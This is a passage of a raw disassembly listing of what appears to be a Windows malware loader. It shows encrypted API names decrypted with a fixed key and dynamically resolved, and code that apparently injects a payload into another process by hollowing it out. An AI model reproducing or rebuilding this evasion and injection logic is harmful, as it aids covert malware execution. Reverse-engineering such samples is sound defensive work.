sub esp, 2E8h
mov [ebp+var_2DC], 0FFFFFFFFh
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+34h]
push edx
mov eax, [ebp+lpString2]
push eax ; lpString2
call sub_4017A0
add esp, 0Ch
mov [ebp+hMem], eax
cmp [ebp+hMem], 0
jnz short loc_401A74
mov eax, [ebp+var_2DC]
jmp loc_401CE6
; ---------------------------------------------------------------------------
loc_401A74: ; CODE XREF: sub_401A30+37�j
lea ecx, [ebp+var_4]
push ecx
lea edx, [ebp+var_2E0]
push edx
mov eax, [ebp+arg_14]
push eax
lea ecx, [ebp+var_8]
push ecx
lea edx, [ebp+var_2DC]
push edx
lea eax, [ebp+var_2D4]
push eax
mov ecx, [ebp+hMem]
push ecx
call sub_401930
add esp, 1Ch
test eax, eax
jz loc_401CD1
mov [ebp+var_2E4], 0
mov edx, [ebp+arg_4]
mov eax, [edx+34h]
cmp eax, [ebp+var_2E0]
jnz short loc_401AFE
mov ecx, [ebp+var_4]
cmp ecx, [ebp+arg_10]
jb short loc_401AFE
mov edx, [ebp+var_2E0]
mov [ebp+var_2E4], edx
lea eax, [ebp+var_2E8]
push eax
push 40h
mov ecx, [ebp+var_4]
push ecx
mov edx, [ebp+var_2E4]
push edx
mov eax, [ebp+var_2DC]
push eax
call dword_4052BC
jmp loc_401BA3
; ---------------------------------------------------------------------------
loc_401AFE: ; CODE XREF: sub_401A30+92�j
; sub_401A30+9A�j
call sub_401780
test eax, eax
jz loc_401BA3
mov ecx, [ebp+var_2E0]
push ecx
mov edx, [ebp+var_2DC]
push edx
call sub_4018E0
add esp, 8
test eax, eax
jz short loc_401B4A
push 40h
push 3000h
mov eax, [ebp+arg_10]
push eax
mov ecx, [ebp+arg_4]
mov edx, [ecx+34h]
push edx
mov eax, [ebp+var_2DC]
push eax
call dword_4052E0
mov [ebp+var_2E4], eax
loc_401B4A: ; CODE XREF: sub_401A30+F3�j
cmp [ebp+var_2E4], 0
jnz short loc_401BA3
mov ecx, [ebp+arg_4]
push ecx
call sub_401800
add esp, 4
test eax, eax
jz short loc_401BA3
push 40h
push 3000h
mov edx, [ebp+arg_10]
push edx
push 0
mov eax, [ebp+var_2DC]
push eax
call dword_4052E0
mov [ebp+var_2E4], eax
cmp [ebp+var_2E4], 0
jz short loc_401BA3
mov ecx, [ebp+var_2E4]
push ecx
mov edx, [ebp+arg_C]
push edx
mov eax, [ebp+arg_4]
push eax
call sub_401840
add esp, 0Ch
loc_401BA3: ; CODE XREF: sub_401A30+C9�j
; sub_401A30+D5�j ...
cmp [ebp+var_2E4], 0
jz loc_401CA1
lea ecx, [ebp+var_2E8]
push ecx
push 4
lea edx, [ebp+var_2E4]
push edx
mov eax, [ebp+var_230]
add eax, 8
push eax
mov ecx, [ebp+var_2DC]
push ecx
call dword_4052E4
mov edx, [ebp+arg_4]
mov eax, [ebp+var_2E4]
mov [edx+34h], eax
lea ecx, [ebp+var_2E8]
push ecx
mov edx, [ebp+arg_10]
push edx
mov eax, [ebp+arg_C]
push eax
mov ecx, [ebp+var_2E4]
push ecx
mov edx, [ebp+var_2DC]
push edx
call dword_4052E4
test eax, eax
jz short loc_401C6F
mov [ebp+var_2D4], 10007h
mov eax, [ebp+var_2E4]
cmp eax, [ebp+var_2E0]
jnz short loc_401C36
mov ecx, [ebp+arg_4]
mov edx, [ecx+34h]
mov eax, [ebp+arg_4]
add edx, [eax+28h]
mov [ebp+var_224], edx
jmp short loc_401C48
; ---------------------------------------------------------------------------
loc_401C36: ; CODE XREF: sub_401A30+1F0�j
mov ecx, [ebp+arg_4]
mov edx, [ebp+var_2E4]
add edx, [ecx+28h]
mov [ebp+var_224], edx
loc_401C48: ; CODE XREF: sub_401A30+204�j
lea eax, [ebp+var_2D4]
push eax
mov ecx, [ebp+var_8]
push ecx
call dword_4052D8
mov edx, [ebp+var_8]
push edx
call dword_4052D0
mov eax, [ebp+var_8]
push eax
call dword_405290
jmp short loc_401C9F
; ---------------------------------------------------------------------------
loc_401C6F: ; CODE XREF: sub_401A30+1D8�j
push 0
mov ecx, [ebp+var_2DC]
push ecx
call dword_4052F4
mov edx, [ebp+var_8]
push edx
call dword_405290
mov eax, [ebp+var_2DC]
push eax
call dword_405290
mov [ebp+var_2DC], 0FFFFFFFFh
loc_401C9F: ; CODE XREF: sub_401A30+23D�j
jmp short loc_401CD1
; ---------------------------------------------------------------------------
loc_401CA1: ; CODE XREF: sub_401A30+17A�j
push 0
mov ecx, [ebp+var_2DC]
push ecx
call dword_4052F4
mov edx, [ebp+var_8]
push edx
call dword_405290
mov eax, [ebp+var_2DC]
push eax
call dword_405290
mov [ebp+var_2DC], 0FFFFFFFFh
loc_401CD1: ; CODE XREF: sub_401A30+76�j
; sub_401A30:loc_401C9F�j
mov ecx, [ebp+hMem]
push ecx ; hMem
call sub_401040
add esp, 4
mov eax, [ebp+var_2DC]
loc_401CE6: ; CODE XREF: sub_401A30+3F�j
mov esp, ebp
pop ebp
retn
sub_401A30 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_401CF0(int, int, LPCSTR lpString2, int)
sub_401CF0 proc near ; CODE XREF: start+102�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
lpString2 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 14h
mov [ebp+var_10], 0FFFFFFFFh
lea eax, [ebp+var_4]
push eax
lea ecx, [ebp+var_C]
push ecx
lea edx, [ebp+var_8]
push edx
lea eax, [ebp+var_14]
push eax
mov ecx, [ebp+arg_4]
push ecx
mov edx, [ebp+arg_0]
push edx
call sub_401490
add esp, 18h
test eax, eax
jz short loc_401D57
mov eax, [ebp+arg_C]
push eax ; int
mov ecx, [ebp+var_4]
push ecx ; int
mov edx, [ebp+var_C]
push edx ; int
mov eax, [ebp+var_8]
push eax ; int
mov ecx, [ebp+var_14]
push ecx ; int
mov edx, [ebp+lpString2]
push edx ; lpString2
call sub_401A30
add esp, 18h
mov [ebp+var_10], eax
push 4000h
mov eax, [ebp+var_4]
push eax
mov ecx, [ebp+var_C]
push ecx
call dword_4052B8
loc_401D57: ; CODE XREF: sub_401CF0+2F�j
mov eax, [ebp+var_10]
mov esp, ebp
pop ebp
retn
sub_401CF0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401D60 proc near ; CODE XREF: start+2F�p
hLibModule = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 0Ch
push offset ModuleName ; "Ήι8―"
call ds:GetModuleHandleA ; GetModuleHandleA
mov [ebp+var_8], eax
push offset asc_405018 ; "Ό"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+hLibModule], eax
push offset asc_4051E8 ; "Ά"
call ds:LoadLibraryA ; LoadLibraryA
mov [ebp+var_4], eax
push offset ProcName ; ""
mov eax, [ebp+hLibModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052FC, eax
push offset aB ; ""
mov ecx, [ebp+hLibModule]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052E0, eax
push offset aR ; ""
mov edx, [ebp+hLibModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052C0, eax
push offset aNN ; "κ\t"
mov eax, [ebp+var_8]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_405294, eax
push offset aSq9j8 ; "ο9¦8"
mov ecx, [ebp+hLibModule]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_405298, eax
push offset aFq9v ; "ο9’"
mov edx, [ebp+hLibModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052A8, eax
push offset aR_0 ; ""
mov eax, [ebp+hLibModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_40528C, eax
push offset aE ; "
"
mov ecx, [ebp+hLibModule]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052AC, eax
push offset aB_0 ; ""
mov edx, [ebp+hLibModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052B4, eax
push offset aB_1 ; ""
mov eax, [ebp+hLibModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052BC, eax
push offset aAq5 ; "ο5·"
mov ecx, [ebp+hLibModule]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052E4, eax
push offset aD ; ""
mov edx, [ebp+hLibModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052D8, eax
push offset aE_0 ; "
"
mov eax, [ebp+hLibModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052D0, eax
push offset aF ; ""
mov ecx, [ebp+hLibModule]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_405290, eax
push offset aG ; ""
mov edx, [ebp+hLibModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052F4, eax
push offset aB_2 ; ""
mov eax, [ebp+hLibModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052B8, eax
push offset aR_1 ; ""
mov ecx, [ebp+hLibModule]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052F0, eax
push offset aD_0 ; ""
mov edx, [ebp+hLibModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052C8, eax
push offset aD_1 ; ""
mov eax, [ebp+hLibModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052A0, eax
push offset aEs0aNNuqM ; "
ι0\x1B{N=γqΞΓΩ\bΦ"
mov ecx, [ebp+var_8]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052D4, eax
push offset aEs0z ; "
ι0"
mov edx, [ebp+var_8]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_405288, eax
push offset aEs0d ; "
ι0"
mov eax, [ebp+var_8]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_40529C, eax
push offset aFq9v_0 ; "ο9’"
mov ecx, [ebp+hLibModule]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052C4, eax
push offset aE_1 ; "
"
mov edx, [ebp+hLibModule]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052B0, eax
push offset aD_2 ; ""
mov eax, [ebp+hLibModule]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052F8, eax
push offset aR_2 ; ""
mov ecx, [ebp+hLibModule]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052CC, eax
push offset aR_3 ; ""
mov edx, [ebp+var_4]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052E8, eax
push offset aE_2 ; "
"
mov eax, [ebp+var_4]
push eax ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052DC, eax
push offset aE_3 ; "
"
mov ecx, [ebp+var_4]
push ecx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052A4, eax
push offset aE_4 ; "
"
mov edx, [ebp+var_4]
push edx ; hModule
call ds:GetProcAddress ; GetProcAddress
mov dword_4052EC, eax
cmp dword_4052FC, 0
jz loc_402132
cmp dword_4052E0, 0
jz loc_402132
cmp dword_4052C0, 0
jz loc_402132
cmp dword_405294, 0
jz loc_402132
cmp dword_405298, 0
jz loc_402132
cmp dword_4052A8, 0
jz loc_402132
cmp dword_40528C, 0
jz loc_402132
cmp dword_4052AC, 0
jz loc_402132
cmp dword_4052B4, 0
jz loc_402132
cmp dword_4052BC, 0
jz loc_402132
cmp dword_4052E4, 0
jz loc_402132
cmp dword_4052D8, 0
jz loc_402132
cmp dword_4052D0, 0
jz loc_402132
cmp dword_405290, 0
jz loc_402132
cmp dword_4052F4, 0
jz loc_402132
cmp dword_4052B8, 0
jz short loc_402132
cmp dword_4052F0, 0
jz short loc_402132
cmp dword_4052C8, 0
jz short loc_402132
cmp dword_4052A0, 0
jz short loc_402132
cmp dword_4052D4, 0
jz short loc_402132
cmp dword_405288, 0
jz short loc_402132
cmp dword_40529C, 0
jz short loc_402132
cmp dword_4052C4, 0
jz short loc_402132
cmp dword_4052B0, 0
jz short loc_402132
cmp dword_4052F8, 0
jz short loc_402132
cmp dword_4052CC, 0
jz short loc_402132
cmp dword_4052E8, 0
jz short loc_402132
cmp dword_4052DC, 0
jz short loc_402132
cmp dword_4052A4, 0
jz short loc_402132
cmp dword_4052EC, 0
jnz short loc_402140
loc_402132: ; CODE XREF: sub_401D60+28F�j
; sub_401D60+29C�j ...
mov eax, [ebp+hLibModule]
push eax ; hLibModule
call ds:FreeLibrary ; FreeLibrary
xor al, al
jmp short loc_402142
; ---------------------------------------------------------------------------
loc_402140: ; CODE XREF: sub_401D60+3D0�j
mov al, 1
loc_402142: ; CODE XREF: sub_401D60+3DE�j
mov esp, ebp
pop ebp
retn
sub_401D60 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402150 proc near ; CODE XREF: start+2A�p
push ebp
mov ebp, esp
push esi
push edi
push 9
push offset ModuleName ; "Ήι8―"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset ModuleName ; "Ήι8―"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset asc_405018 ; "Ό"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset asc_405018 ; "Ό"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset asc_4051E8 ; "Ά"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset asc_4051E8 ; "Ά"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset ProcName ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset ProcName ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Eh
push offset aB ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aB ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 12h
push offset aR ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aR ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 14h
push offset aNN ; "κ\t"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aNN ; "κ\t"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aSq9j8 ; "ο9¦8"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aSq9j8 ; "ο9¦8"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Eh
push offset aFq9v ; "ο9’"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aFq9v ; "ο9’"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aR_0 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aR_0 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 11h
push offset aE ; "
"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aE ; "
"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Eh
push offset aB_0 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aB_0 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aB_1 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aB_1 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 12h
push offset aAq5 ; "ο5·"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aAq5 ; "ο5·"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aD ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aD ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aE_0 ; "
"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aE_0 ; "
"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aF ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aF ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aG ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aG ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aB_2 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aB_2 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aD_0 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aD_0 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aR_1 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aR_1 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 5
push offset aD_1 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aD_1 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 11h
push offset aEs0aNNuqM ; "
ι0\x1B{N=γqΞΓΩ\bΦ"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aEs0aNNuqM ; "
ι0\x1B{N=γqΞΓΩ\bΦ"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 13h
push offset aEs0z ; "
ι0"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aEs0z ; "
ι0"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 1Eh
push offset aEs0d ; "
ι0"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aEs0d ; "
ι0"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aFq9v_0 ; "ο9’"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aFq9v_0 ; "ο9’"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 8
push offset aE_1 ; "
"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aE_1 ; "
"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Dh
push offset aR_2 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aR_2 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Eh
push offset aD_2 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aD_2 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Ch
push offset aR_3 ; ""
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aR_3 ; ""
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aE_2 ; "
"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aE_2 ; "
"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 10h
push offset aE_3 ; "
"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aE_3 ; "
"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
push 0Bh
push offset aE_4 ; "
"
push offset aFor0toud ; "for0toud"
call sub_401050
add esp, 0Ch
mov edi, eax
mov edx, offset aE_4 ; "
"
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov eax, ecx
mov edi, edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
pop edi
pop esi
pop ebp
retn
sub_402150 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4028A0 proc near ; CODE XREF: sub_402E00+EA�p
; sub_402E00+10B�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_4028B5
mov eax, [ebp+arg_0]
jmp short loc_402909
; ---------------------------------------------------------------------------
loc_4028B5: ; CODE XREF: sub_4028A0+E�j
; sub_4028A0+65�j
mov edx, [ebp+arg_0]
movsx eax, byte ptr [edx]
test eax, eax
jz short loc_402907
mov ecx, [ebp+arg_0]
mov [ebp+var_8], ecx
mov edx, [ebp+arg_4]
mov [ebp+var_4], edx
loc_4028CB: ; CODE XREF: sub_4028A0+5A�j
mov eax, [ebp+var_4]
movsx ecx, byte ptr [eax]
test ecx, ecx
jnz short loc_4028DA
mov eax, [ebp+arg_0]
jmp short loc_402909
; ---------------------------------------------------------------------------
loc_4028DA: ; CODE XREF: sub_4028A0+33�j
mov edx, [ebp+var_8]
movsx eax, byte ptr [edx]
mov ecx, [ebp+var_4]
movsx edx, byte ptr [ecx]
mov ecx, [ebp+var_4]
add ecx, 1
mov [ebp+var_4], ecx
mov ecx, [ebp+var_8]
add ecx, 1
mov [ebp+var_8], ecx
cmp eax, edx
jz short loc_4028CB
mov edx, [ebp+arg_0]
add edx, 1
mov [ebp+arg_0], edx
jmp short loc_4028B5
; ---------------------------------------------------------------------------
loc_402907: ; CODE XREF: sub_4028A0+1D�j
xor eax, eax
loc_402909: ; CODE XREF: sub_4028A0+13�j
; sub_4028A0+38�j
mov esp, ebp
pop ebp
retn
sub_4028A0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402910 proc near ; CODE XREF: sub_401490+15F�p
; sub_401490+238�p
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
mov ecx, [ebp+arg_4]
mov [ebp+var_8], ecx
mov edx, [ebp+var_8]
cmp edx, [ebp+var_4]
jnb short loc_40296D
mov eax, [ebp+var_8]
add eax, [ebp+arg_8]
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
add ecx, [ebp+arg_8]
mov [ebp+var_4], ecx
jmp short loc_402947
; ---------------------------------------------------------------------------
loc_40293E: ; CODE XREF: sub_402910+59�j
mov edx, [ebp+arg_8]
sub edx, 1
mov [ebp+arg_8], edx
loc_402947: ; CODE XREF: sub_402910+2C�j
cmp [ebp+arg_8], 0
jz short loc_40296B
mov eax, [ebp+var_8]
sub eax, 1
mov [ebp+var_8], eax
mov ecx, [ebp+var_4]
sub ecx, 1
mov [ebp+var_4], ecx
mov edx, [ebp+var_4]
mov eax, [ebp+var_8]
mov cl, [eax]
mov [edx], cl
jmp short loc_40293E
; ---------------------------------------------------------------------------
loc_40296B: ; CODE XREF: sub_402910+3B�j
jmp short loc_4029A4
; ---------------------------------------------------------------------------
loc_40296D: ; CODE XREF: sub_402910+18�j
mov edx, [ebp+var_8]
cmp edx, [ebp+var_4]
jz short loc_4029A4
jmp short loc_402980
; ---------------------------------------------------------------------------
loc_402977: ; CODE XREF: sub_402910+92�j
mov eax, [ebp+arg_8]
sub eax, 1
mov [ebp+arg_8], eax
loc_402980: ; CODE XREF: sub_402910+65�j
cmp [ebp+arg_8], 0
jz short loc_4029A4
